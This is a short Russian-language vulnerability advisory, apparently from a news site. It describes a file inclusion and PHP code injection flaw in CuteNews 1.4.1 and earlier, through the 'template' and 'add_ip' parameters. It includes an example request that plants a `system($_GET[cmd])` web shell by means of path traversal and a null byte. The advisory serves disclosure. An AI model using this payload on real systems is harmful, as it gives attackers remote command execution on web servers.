Программа: CuteNews 1.4.1 и более ранние версии

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре "template" в
сценариях "show_archives.php" и "show_news.php".
Удаленный пользователь может подключить и
выполнить произвольный локальный файл на
целевой системе. Злоумышленник может
внедрить PHP код в файл "inc/ipban.mdu" с
помощью параметра "add_ip" и затем
выполнить его с привилегиями web сервера.

Пример:

http://[target]/cute141/show_archives.php?template=../inc/ ipban.mdu%00&member_db[1]=1&action=add&add_ip=
<?php%20system($_GET[cmd]);?>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии